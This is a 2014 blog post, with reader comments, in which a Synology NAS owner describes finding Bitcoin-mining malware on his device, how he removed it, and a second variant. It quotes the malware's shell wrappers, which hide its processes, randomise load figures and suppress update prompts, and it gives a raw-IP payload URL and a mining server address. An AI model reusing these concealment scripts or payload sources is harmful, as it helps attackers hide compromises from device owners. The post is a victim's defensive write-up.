Banner
My Synology RackStation got Hacked!
This is my site Written by Grant on February 10, 2014 – 11:15 pm

I post this here in case others are searching for this issue as I couldn’t find much about it – there is however a mention of it at the Synology forum: http://forum.synology.com/enu/viewtopic.php?f=19&t=80857

There is also a discussion on Facebook : https://www.facebook.com/synology/posts/10152007533142897

 

Today I found that my 22-bay Synology RackStation has been hacked and that the resource monitor on the main web interface was tampered with – I guess to hide the massive resource usage from the hackers who ran BitCoin mining software

I got suspicious when my Rack Station started to seem really slow when running Download Station – I logged in via ssh and ran TOP and saw 3 processes using 25% CPU – they were called PWNEDm and connected to an IP address of 46.244.18.176 on tcp port 9555

After some investigation I found the rogue folder (/PWNED) – It seem to download payload from here: http://65.36.55.70:5000/jynx2.so

I was able to kill the three tasks and delete the folder – nothing else could be found so I think it’s gone; although it has modified some files and I am not sure of the exact full extent yet.

The tasks were called PWNEDm – upon looking at this with a hex editor it is clearly just “mined” renamed – a Linux BitCoin miner

What is scary is that they seem to know that they were running on a DiskStation as some of the files/scripts appear to reference Synology file paths so they can overwirte files and hide their presence.

I am reluctant to reboot as maybe some Synology files are damaged — I can already see a few scripts such as:

top.cgi:
#!/bin/sh /usr/syno/synoman/webman/modules/ResourceMonitor/top2.cgi | awk -v RS='[^\n]*\n*[^\n]*(PWNED|top2.cgi)([^\n]*\n){6}’ ‘{print}’ ORS=””

upgrade.cgi:
#!/bin/sh /usr/syno/synoman/webman/modules/ControlPanel/modules/upgrade2.cgi | sed -e ‘s/\(“available_for_download” *: *\).*,/\1 false,/’

rsrcmonitor3.cg1:
#!/bin/sh
rand1=$((RANDOM%10))
rand2=$((RANDOM%10))
rand3=$((RANDOM%10))
rand4=$((RANDOM%10))
rand5=$((RANDOM%10))
rand6=$((RANDOM%10))

/usr/syno/synoman/webman/modules/ResourceMonitor/rsrcmonitor3.cgi | sed -e “s/\(\”15minLoad\” *: *\)[0-9]*\(,*\)/\1$rand1\2/” -e “s/\(\”1minLoad\” *: *\)[0-9]*\(,*\)/\1$rand2\2/” -e “s/\(\”5minLoad\” *: *\)[0-9]*\(,*\)/\1$rand3\2/” -e “s/\(\”OtherLoad\” *: *\)[0-9]*\(,*\)/\1$rand4\2/” -e “s/\(\”SystemLoad\” *: *\)[0-9]*\(,*\)/\1$rand5\2/” -e “s/\(\”UserLoad\” *: *\)[0-9]*\(,*\)/\1$rand6\2/”

These appear to overwrite some Synology files and perform other mischief

Before I reboot, what I would like to know is if I look at all the scripts and note down all the files they modify could I copy “clean” files from my DS214+ to my RackStation 2212+ ???

I do have pretty tight password set too — containing numbers, letters and some punctuation chars — very weird! I only allow outside access to the Download Station plugin, and only to a few friends who have their own account and string passwords – in the meantime I’ve blocked it at my firewall and added firewall blocks on the two IP addresses mentioned above, just in case!

I will follow this up on the Synology forum – For those that wanted the PWNED folder to analyse it you can find it here:  Syno-PWNED

 

Update:  There seems to be two versions.

The one I found (user ‘smmsp’ with multiple PWNEDm process running – actually a program called mined that’s been renamed , no other apparent damage besides tampering with some Synology web-interface files ot hide it’s CPU activity.  Seems to all be started form a user called smmsp (Sendmail user – listed in the /etc/passwd file)

There also seems to be another variant that actively looks for username/passwords in places such as /etc/ddns.conf, adds a folder called /volume1/startup with a Pearl script to activate itself. This one also seems to tamper with some rudimentary command line tools such as ls, cat and top to prevent removal.

 

 

4 Responses »

  1. You can’t copy from DS214+ to an RS 2212+. ARM vs. Intel CPU.

  2. I found out the hard way !

    I was able to download the old version of DSM for my box from http://ukdl.synology.com/download/DSM/ and then unzip it using 7Zip until I got to the correct files

    It still hasn’t fixed the interface errors but I am hoping a reboot sorts these out.

  3. I just discovered my DiskStation was hacked. Thanks for the write up. I’m just beginning investigation and will post here if I find out anything more. I’m most curious what vuln they exploited. Looking in the logs doesn’t show anything obvious.

  4. Hi Grant, we have released an updated DSM version to fix the security issues. Please find more information at http://www.synology.com/en-global/company/news/article/437. If your DiskStation still behaves suspiciously after being upgraded to the latest DSM version, please contact security@synology.com. Thank you.

Leave a Reply

PLEASE COMPLETE THIS CAPTCHA QUESTION *